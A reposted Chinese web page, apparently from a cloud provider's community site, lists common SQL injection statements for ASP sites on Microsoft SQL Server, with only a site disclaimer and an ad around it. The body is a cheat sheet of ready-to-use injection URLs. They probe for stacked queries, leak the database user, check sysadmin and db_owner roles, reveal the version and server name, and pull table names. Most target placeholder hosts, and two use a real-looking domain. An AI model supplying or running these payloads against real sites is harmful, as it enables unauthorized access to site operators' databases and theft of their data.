站長注意SQL 注入一些常用語句

來源:互聯網
上載者:User

站長注意SQL 注入一些常用語句

作者:aivii 來源:csdn  

是否支援多句查詢
http://www.xxx.com/shownews.asp?id=51 declare @a int--

是否支援子查詢
http://www.xxx.com/shownews.asp?id=51 and (Select count(1) from [sysobjects])>=0

返回使用者名稱
http://www.xxx.com/shownews.asp?id=51 And user%2Bchar(124)=0

目前使用者是否為 sysadmin 固定伺服器角色的成員。
http://www.xxx.com/shownews.asp?id=51 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1

PS:0x730079007300610064006D0069006E00 = sysadmin

目前使用者是否為 db_owner 固定資料庫角色的成員
http://www.xxx.com/shownews.asp?id=51 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))%2Bchar(124)=1

0x640062005F006F0077006E0065007200 = db_owner

返回資料庫名
http://www.xxx.com/shownews.asp?id=51 And db_name()%2Bchar(124)=0

作業系統和SQLserver版本
http://www.99568.com/shownews.asp?id=51 And @@version = 1

本機伺服器名稱
http://www.99568.com/shownews.asp?id=51 And @@SERVERNAME = 1

http://www.xxx.com.cn/Content.asp?NewsID=1077  And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0 --第一個表名

 

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.